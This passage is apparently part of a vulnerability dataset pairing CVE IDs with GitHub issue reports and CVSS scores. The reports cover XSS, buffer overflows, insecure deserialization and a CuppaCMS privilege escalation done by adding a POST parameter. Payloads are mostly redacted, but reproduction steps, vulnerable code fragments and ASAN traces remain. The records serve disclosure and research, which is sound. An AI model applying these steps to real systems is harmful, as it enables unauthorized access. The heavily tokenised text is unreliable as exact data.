  67684. "Repo_new": "snlbaral/hide-thread-content",
  67685. "Issue_Created_At": "2021-01-27T22:34:32Z",
  67686. "description": "Hidden content visible without replying. Hidden thread content is able to be viewed without replying by using the _reply_ or _quote_ button located in the postbit. By clicking either of the two buttons you can view the thread content in the APITAG brackets without having to actually reply. Example: FILETAG A solution would be to add a custom message inside the quote brackets for users who haven't replied, so that thread content isn't revealed. Example: APITAG ERRORTAG APITAG",
  67687. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  67688. "severity": "HIGH",
  67689. "baseScore": 7.5,
  67690. "impactScore": 3.6,
  67691. "exploitabilityScore": 3.9
  67692. },
  67693. {
  67694. "CVE_ID": "CVE-2021-33430",
  67695. "Issue_Url_old": "https://github.com/numpy/numpy/issues/18939",
  67696. "Issue_Url_new": "https://github.com/numpy/numpy/issues/18939",
  67697. "Repo_new": "numpy/numpy",
  67698. "Issue_Created_At": "2021-05-07T18:30:11Z",
  67699. "description": "Potential buffer overflow in APITAG of ctors.c. APITAG Reproducing code example: Snippet : APITAG int nd ,......) { ............... if (descr >subarray) { APITAG ret; npy_intp newdims FILETAG Possible call path NUMBERTAG array_new > APITAG NUMBERTAG APITAG > APITAG NUMBERTAG array_fromfile > APITAG > APITAG APITAG version information: The main branch of APITAG",
  67700. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  67701. "severity": "MEDIUM",
  67702. "baseScore": 5.3,
  67703. "impactScore": 3.6,
  67704. "exploitabilityScore": 1.6
  67705. },
  67706. {
  67707. "CVE_ID": "CVE-2021-33473",
  67708. "Issue_Url_old": "https://github.com/markevans/dragonfly/issues/513",
  67709. "Issue_Url_new": "https://github.com/markevans/dragonfly/issues/513",
  67710. "Repo_new": "markevans/dragonfly",
  67711. "Issue_Created_At": "2021-04-28T23:40:59Z",
  67712. "description": "Security Issue Report. Hello, we have discovered a security issue within this project. Do you have a preferred security contact that we could reach out to discuss this issue? Thank you very much!",
  67713. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  67714. "severity": "CRITICAL",
  67715. "baseScore": 9.1,
  67716. "impactScore": 5.2,
  67717. "exploitabilityScore": 3.9
  67718. },
  67719. {
  67720. "CVE_ID": "CVE-2021-3355",
  67721. "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/18",
  67722. "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/18",
  67723. "Repo_new": "eddy8/lightcms",
  67724. "Issue_Created_At": "2021-01-26T06:15:44Z",
  67725. "description": "Stored XSS in \"exclusive\" field APITAG Description There's no escape being done before printing out the value of noun \u3001 verb \u3001 exclusive in the APITAG page. APITAG version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the exclusive field value. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  67726. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67727. "severity": "MEDIUM",
  67728. "baseScore": 5.4,
  67729. "impactScore": 2.7,
  67730. "exploitabilityScore": 2.3
  67731. },
  67732. {
  67733. "CVE_ID": "CVE-2021-33558",
  67734. "Issue_Url_old": "https://github.com/mdanzaruddin/CVE-2021-33558./issues/1",
  67735. "Issue_Url_new": "https://github.com/mdanzaruddin/cve-2021-33558./issues/1",
  67736. "Repo_new": "mdanzaruddin/cve-2021-33558.",
  67737. "Issue_Created_At": "2021-06-01T21:18:29Z",
  67738. "description": "clarify this \"vulnerability\"?. Can you clarify this report? The files you mention are not part of the Boa NUMBERTAG distribution: FILETAG",
  67739. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  67740. "severity": "HIGH",
  67741. "baseScore": 7.5,
  67742. "impactScore": 3.6,
  67743. "exploitabilityScore": 3.9
  67744. },
  67745. {
  67746. "CVE_ID": "CVE-2021-33570",
  67747. "Issue_Url_old": "https://github.com/Paxa/postbird/issues/132",
  67748. "Issue_Url_new": "https://github.com/paxa/postbird/issues/132",
  67749. "Repo_new": "paxa/postbird",
  67750. "Issue_Created_At": "2021-05-25T13:48:21Z",
  67751. "description": "Security Vulnerability FILETAG team has found the XSS vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. We were able to inject malicious APITAG into the application, leading us to two other vulnerabilities, Local File Inclusion(LFI) and APITAG Password Stealing. Proof of Concept Code & detailed vulnerability report can be found here: URLTAG",
  67752. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67753. "severity": "MEDIUM",
  67754. "baseScore": 5.4,
  67755. "impactScore": 2.7,
  67756. "exploitabilityScore": 2.3
  67757. },
  67758. {
  67759. "CVE_ID": "CVE-2021-33570",
  67760. "Issue_Url_old": "https://github.com/Paxa/postbird/issues/133",
  67761. "Issue_Url_new": "https://github.com/paxa/postbird/issues/133",
  67762. "Repo_new": "paxa/postbird",
  67763. "Issue_Created_At": "2021-05-25T13:51:01Z",
  67764. "description": "Security Vulnerability FILETAG team has found the LFI vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. Using this vulnerability we can steal any file located on the Postbird application user's computer. Proof of Concept Code & detailed vulnerability report can be found here: URLTAG",
  67765. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67766. "severity": "MEDIUM",
  67767. "baseScore": 5.4,
  67768. "impactScore": 2.7,
  67769. "exploitabilityScore": 2.3
  67770. },
  67771. {
  67772. "CVE_ID": "CVE-2021-33570",
  67773. "Issue_Url_old": "https://github.com/Paxa/postbird/issues/134",
  67774. "Issue_Url_new": "https://github.com/paxa/postbird/issues/134",
  67775. "Repo_new": "paxa/postbird",
  67776. "Issue_Created_At": "2021-05-25T13:53:33Z",
  67777. "description": "Security Vulnerability FILETAG team has found a vulnerability in the Postbird application version NUMBERTAG The vulnerability was very Critical and exploiting the vulnerability can lead to APITAG password breach. Using this vulnerability a hacker can steal every APITAG password saved in your Postbird application. Proof of Concept Code & detailed vulnerability report can be found here: URLTAG",
  67778. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  67779. "severity": "MEDIUM",
  67780. "baseScore": 5.4,
  67781. "impactScore": 2.7,
  67782. "exploitabilityScore": 2.3
  67783. },
  67784. {
  67785. "CVE_ID": "CVE-2021-33590",
  67786. "Issue_Url_old": "https://github.com/labapart/gattlib/issues/219",
  67787. "Issue_Url_new": "https://github.com/labapart/gattlib/issues/219",
  67788. "Repo_new": "labapart/gattlib",
  67789. "Issue_Created_At": "2021-05-27T07:57:08Z",
  67790. "description": "stack_based buffer. Hi Team, Stack based buffer overflow is observed in FILETAG and FILETAG while fuzzing GATTLIB using CLANG with AFL FUZZER Vulnerable code from read_write.c connection = gattlib_connect(NULL, arg NUMBERTAG APITAG if (connection == NULL) { fprintf(stderr, APITAG to connect to the bluetooth APITAG return NUMBERTAG ulnerable code from gattlib.c // Transform string from 'DA NUMBERTAG E NUMBERTAG to 'dev_DA NUMBERTAG E NUMBERTAG strncpy(device_address_str, mac_address, sizeof(device_address_str)); for (int i NUMBERTAG i APITAG mkdir build && cd build cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address fsanitize=leak g\" DCMAKE_C_FLAGS=\" fsanitize=address fsanitize=leak g\" make PATHTAG APITAG read NUMBERTAG a NUMBERTAG f9b NUMBERTAG fb ASAN output Failed to get adapter PATHTAG Error calling APITAG for APITAG Timeout was reached APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG at pc NUMBERTAG efb9 bp NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG cd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG thread T NUMBERTAG efb8 in strlen ( PATHTAG NUMBERTAG fb3c NUMBERTAG c NUMBERTAG in get_device_path_from_mac PATHTAG NUMBERTAG fb3c NUMBERTAG c NUMBERTAG in gattlib_connect PATHTAG NUMBERTAG c NUMBERTAG b in main PATHTAG NUMBERTAG fb3c NUMBERTAG e0b2 in __libc_start_main PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) Address NUMBERTAG ffc NUMBERTAG cd4d NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG fb3c NUMBERTAG c2bf in gattlib_connect PATHTAG This frame has NUMBERTAG object(s NUMBERTAG device_address_str.i' (line NUMBERTAG APITAG NUMBERTAG b NUMBERTAG f2 f2 f2 f2 f NUMBERTAG f2 f2 f NUMBERTAG c NUMBERTAG f3 f3 f3 f3 f3 f3 f NUMBERTAG d NUMBERTAG e NUMBERTAG f1 f1 f1 f NUMBERTAG f NUMBERTAG f2 f2 f2 f8 f2 f2 f2 f8 f8 f8 f8 f8 f2 f2 f NUMBERTAG a NUMBERTAG f2 f2 f8 f8 f8 f8 f8 f3 f3 f3 f3 f 
NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Request team to implement proper patch and validate",
  67791. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67792. "severity": "CRITICAL",
  67793. "baseScore": 9.8,
  67794. "impactScore": 5.9,
  67795. "exploitabilityScore": 3.9
  67796. },
  67797. {
  67798. "CVE_ID": "CVE-2021-3376",
  67799. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/12",
  67800. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/12",
  67801. "Repo_new": "cuppacms/cuppacms",
  67802. "Issue_Created_At": "2021-01-30T18:04:55Z",
  67803. "description": "Privilege Escalation Vulnerability due to the session validation weakness. Description: Privilege Escalation Vulnerability due to the session validation weakness The Profile function in APITAG before NUMBERTAG Jan NUMBERTAG has a privilege escalation vulnerability due to the session validation weakness. Attacker could escalate their privilege to Super Admin by tampering the HTTP Request, then to obtain full control of the APITAG Proof of Concept Step NUMBERTAG Access the profile function with a low privilege account FILETAG Step NUMBERTAG Add the user_group_id_field as one of the POST parameter, and set the value to NUMBERTAG Original Request FILETAG Edited Request: added the \"user_group_id_field\" parameter as highlighted FILETAG Response NUMBERTAG means successfully updated the record FILETAG Step NUMBERTAG Re login the account, and obtained super admin privilege FILETAG",
  67804. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67805. "severity": "HIGH",
  67806. "baseScore": 8.8,
  67807. "impactScore": 5.9,
  67808. "exploitabilityScore": 2.8
  67809. },
  67810. {
  67811. "CVE_ID": "CVE-2021-33889",
  67812. "Issue_Url_old": "https://github.com/openthread/wpantund/issues/502",
  67813. "Issue_Url_new": "https://github.com/openthread/wpantund/issues/502",
  67814. "Repo_new": "openthread/wpantund",
  67815. "Issue_Created_At": "2021-06-28T03:56:19Z",
  67816. "description": "stack buffer overflow in metric_len . Context: Stack buffer overflow may be triggered while writing to a variable metric_len, which is defined as unsigned short (ref: URLTAG but is considered as unsigned int (ref: URLTAG Expected behavior and actual behavior: Expected Behavior: Trigger an exception, because size of buffer needed, is not available. Actual Behavior: The metric_len variable triggers stack buffer overflow. Version Details: The issue was first found in wpantund: APITAG Affected commits: APITAG to APITAG CVE CVETAG APITAG",
  67817. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67818. "severity": "MEDIUM",
  67819. "baseScore": 6.8,
  67820. "impactScore": 5.9,
  67821. "exploitabilityScore": 0.9
  67822. },
  67823. {
  67824. "CVE_ID": "CVE-2021-33898",
  67825. "Issue_Url_old": "https://github.com/invoiceninja/invoiceninja/issues/5909",
  67826. "Issue_Url_new": "https://github.com/invoiceninja/invoiceninja/issues/5909",
  67827. "Repo_new": "invoiceninja/invoiceninja",
  67828. "Issue_Created_At": "2021-06-03T12:44:38Z",
  67829. "description": "Insecure deserialization versions NUMBERTAG What version of Invoice Ninja are you running NUMBERTAG and below What environment are you running? N/A Have you checked log files ( PATHTAG ) Please provide redacted output N/A Have you searched existing issues? Yes Have you reported this to Slack/forum before posting? No Describe the bug In versions NUMBERTAG and below of APITAG there is an unsafe call to APITAG in ERRORTAG which may allow an attacker to deserialize arbitrary PHP classes. In certain contexts this can result in remote code execution. The argument to unserialize is the output from a HTTP call to APITAG . This is without encryption. Attack vectors are then NUMBERTAG Malicious deserialized object from geoplugin.net NUMBERTAG MITM attack between the invoiceninja service and geoplugin.net Expected behavior Use JSON instead of native PHP objects for untrusted input. Additional context The responsible code is now commented out since APITAG URLTAG , however there is a note about triaging GDPR implications before reintroduction of the code block, so this may be introduced in future versions.",
  67830. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67831. "severity": "HIGH",
  67832. "baseScore": 8.1,
  67833. "impactScore": 5.9,
  67834. "exploitabilityScore": 2.2
  67835. },
  67836. {
  67837. "CVE_ID": "CVE-2021-33928",
  67838. "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/417",
  67839. "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/417",
  67840. "Repo_new": "opensuse/libsolv",
  67841. "Issue_Created_At": "2020-12-13T06:03:06Z",
  67842. "description": "libsolv APITAG function a heap overflow vulnerability. \u201cpool_disabled_solvable\u201d function a heap overflow vulnerability \u201cpool_installable\u201d function a heap overflow vulnerability APITAG function a heap overflow vulnerability Description: There are three heap buffer overflow bugs in function: static inline int pool_disabled_solvable(const Pool pool, Solvable s) static inline int pool_installable(const Pool pool, Solvable s) static inline int APITAG Pool pool, Solvable s) at src/repo.h: line NUMBERTAG line NUMBERTAG and line NUMBERTAG The statement of these three lines are same, as follows: if (!MAPTST(pool >considered, id)) The program defines \u201cMAPTST(m, n)\u201d that \u201c((m) >map (n NUMBERTAG n NUMBERTAG MAPTST(pool >considered, id) is same as pool >considered >map[id NUMBERTAG id NUMBERTAG This statement involves pool >considered >map[id NUMBERTAG The variable pool >considered is a Map structure pointer. The Map structure as following: typedef struct APITAG { unsigned char map; int size; } Map; If the index value \u201cid NUMBERTAG is bigger than pool >considered >size, there is a heap overflow bug. Please reproduce this issue through the following APITAG PATHTAG APITAG pool_disabled_solvable line NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: cannot parse command 'D' disable: unknown package 'E NUMBERTAG src APITAG disable: unknown package 'F NUMBERTAG src APITAG test NUMBERTAG test NUMBERTAG str2job: unknown selection flag 'b' testcase_read: cannot parse command 'repo' test NUMBERTAG Results differ: job noop name (A . 
i NUMBERTAG setarch] APITAG APITAG heap buffer overflow on address NUMBERTAG f1 at pc NUMBERTAG f0ef3b NUMBERTAG cc bp NUMBERTAG fffcdcb NUMBERTAG sp NUMBERTAG fffcdcb NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f1 thread T NUMBERTAG f0ef3b NUMBERTAG cb in pool_disabled_solvable PATHTAG NUMBERTAG f0ef3b NUMBERTAG cb in APITAG PATHTAG NUMBERTAG f0ef3b NUMBERTAG cb in selection_name PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_name_arch PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_name_arch_rel PATHTAG NUMBERTAG f0ef3b NUMBERTAG in selection_make PATHTAG NUMBERTAG f0efce NUMBERTAG e in addselectionjob PATHTAG NUMBERTAG f0efce NUMBERTAG cc6 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f0ef NUMBERTAG f5bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG f1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f0ef3a NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f0ef NUMBERTAG ccdba in map_init PATHTAG NUMBERTAG f0efce NUMBERTAG a in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f0ef NUMBERTAG f5bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in pool_disabled_solvable Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fd fa fa 
NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  67843. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  67844. "severity": "HIGH",
  67845. "baseScore": 7.5,
  67846. "impactScore": 3.6,
  67847. "exploitabilityScore": 3.9
  67848. },
  67849. {
  67850. "CVE_ID": "CVE-2021-33938",
  67851. "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/420",
  67852. "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/420",
  67853. "Repo_new": "opensuse/libsolv",
  67854. "Issue_Created_At": "2020-12-13T06:13:26Z",
  67855. "description": "libsolv \u201cprune_to_recommended\u201d function two heap overflow vulnerabilities. Description: There are two heap buffer overflow vulnerabilities in static void APITAG solv, Queue plist) at src/policy.c: line NUMBERTAG line NUMBERTAG FOR_PROVIDES(p, pp, rec) MAPSET(&solv >recommendsmap, p); // line NUMBERTAG The first case, it involves variable \u201csolv >recommendsmap\u201d. The libsolv defines MAPSET as following: define MAPSET(m, n) ((m) >map (n NUMBERTAG n NUMBERTAG Therefore, MAPSET(&solv >recommendsmap, p) involves the variable \u201csolv >recommendsmap >map[p NUMBERTAG The type of the variable \u201csolv >recommendmap\u201d is the structure Map. The Map structure defines as following: typedef struct APITAG { unsigned char map; int size; } Map; If the value of the index variable \u201cp NUMBERTAG is bigger than \u201csolv >recommendmap >size\u201d, there will be a heap buffer overflow bug. if (!MAPTST(&solv >recommendsmap, p)) // line NUMBERTAG The libsolv defines MAPTST as following: define MAPTST(m, n) ((m) >map[(n NUMBERTAG n NUMBERTAG Therefore, the variable \u201cMAPTST(&solv >recommendsmap, p)\u201d is same with \u201csolv >recommendmap >map[p NUMBERTAG APITAG }'DHA\udb0e\udf2deh\u00c9\u0626\udb41\udf3b testcase_read: cannot parse command APITAG NUMBERTAG u`N NUMBERTAG APITAG NUMBERTAG B\u94fb( \u0587,I NUMBERTAG A~)\u00b5\u714a\u00bc\u00adQ testcase_read: could not open PATHTAG APITAG alternative' APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d1 at pc NUMBERTAG f2ba NUMBERTAG fb3c bp NUMBERTAG ffc4dab NUMBERTAG sp NUMBERTAG ffc4dab NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d1 thread T0 APITAG NUMBERTAG f2ba NUMBERTAG fb3b in policy_update_recommendsmap PATHTAG NUMBERTAG f2ba NUMBERTAG fb3b in prune_to_recommended PATHTAG NUMBERTAG f2ba NUMBERTAG fb3b in policy_filter_unwanted PATHTAG NUMBERTAG f2ba NUMBERTAG d in resolve_dependencies PATHTAG NUMBERTAG f2ba NUMBERTAG faba4 in solver_run_sat 
PATHTAG NUMBERTAG f2ba NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f2b9f NUMBERTAG cbf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG d1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f2ba NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f2ba NUMBERTAG e3dba in map_init PATHTAG NUMBERTAG f2ba NUMBERTAG f1abe in solver_create PATHTAG NUMBERTAG f2ba9da NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f2b9f NUMBERTAG cbf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in policy_update_recommendsmap Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb 
APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Please reproduce this issue through the following APITAG PATHTAG APITAG policy_update_recommendsmap NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: system: unknown repo 'system' str2job: bad line APITAG result: unknown flag 'trans >erase' testcase_read: could not open PATHTAG testcase_read: cannot parse command 'sysine>' testcase_read: could not open PATHTAG testcase_read: cannot parse command APITAG testcase_read: cannot parse command 'sysine>' testcase_read: could not open PATHTAG str2job: bad line APITAG result: unknown flag 'trans >erase' testcase_read: could not open PATHTAG testcase_read: cannot parse command '\u049cX' str2job: bad line 'provrovides E' result: unknown flag 'transction' APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f2e7ddb NUMBERTAG c2 bp NUMBERTAG ffcf NUMBERTAG f0 sp NUMBERTAG ffcf NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2e7ddb NUMBERTAG c1 in prune_to_recommended PATHTAG NUMBERTAG f2e7ddb NUMBERTAG c1 in policy_filter_unwanted PATHTAG NUMBERTAG f2e7de3b5af in solver_choicerulecheck PATHTAG NUMBERTAG f2e7de3b5af in solver_addchoicerules PATHTAG NUMBERTAG f2e7dc NUMBERTAG in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f2e7cc3dbf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f2e7dd9af NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f2e7dc NUMBERTAG dba in map_init PATHTAG NUMBERTAG f2e7dc NUMBERTAG abe in solver_create PATHTAG NUMBERTAG f2e NUMBERTAG da2d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f2e7cc3dbf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow 
PATHTAG in prune_to_recommended Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  67856. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  67857. "severity": "HIGH",
  67858. "baseScore": 7.5,
  67859. "impactScore": 3.6,
  67860. "exploitabilityScore": 3.9
  67861. },
  67862. {
  67863. "CVE_ID": "CVE-2021-33961",
  67864. "Issue_Url_old": "https://github.com/softvar/enhanced-github/issues/96",
  67865. "Issue_Url_new": "https://github.com/softvar/enhanced-github/issues/96",
  67866. "Repo_new": "softvar/enhanced-github",
  67867. "Issue_Created_At": "2021-05-21T10:31:25Z",
  67868. "description": "Stored XSS vulnerability. Use a browser that has installed extensions to access a APITAG repository containing malicious xss code in the file name, and you will be attacked via the xss vulnerability\u3002 as follows\uff1a URLTAG Vulnerability repair suggestions\uff1a Filter keywords and characters: javascript APITAG APITAG",
  67869. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67870. "severity": "MEDIUM",
  67871. "baseScore": 6.1,
  67872. "impactScore": 2.7,
  67873. "exploitabilityScore": 2.8
  67874. },
  67875. {
  67876. "CVE_ID": "CVE-2021-33988",
  67877. "Issue_Url_old": "https://github.com/nck0099/osTicket/issues/2",
  67878. "Issue_Url_new": "https://github.com/nck0099/osticket/issues/2",
  67879. "Repo_new": "nck0099/osticket",
  67880. "Issue_Created_At": "2021-05-23T18:49:14Z",
  67881. "description": "Microweber APITAG Reflected XSS. Microweber Reflected XSS Vuln Description: APITAG XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts._ Impact: High APITAG impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data._ POC: Identified unauthenticated XSS on microweber CMS Version NUMBERTAG APITAG request is modified to insert XSS payload FILETAG NUMBERTAG SS payload inserted has been executed as shown in the snapshot. FILETAG Request: CODETAG Response: CODETAG",
  67882. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  67883. "severity": "MEDIUM",
  67884. "baseScore": 6.1,
  67885. "impactScore": 2.7,
  67886. "exploitabilityScore": 2.8
  67887. },
  67888. {
  67889. "CVE_ID": "CVE-2021-3403",
  67890. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/85",
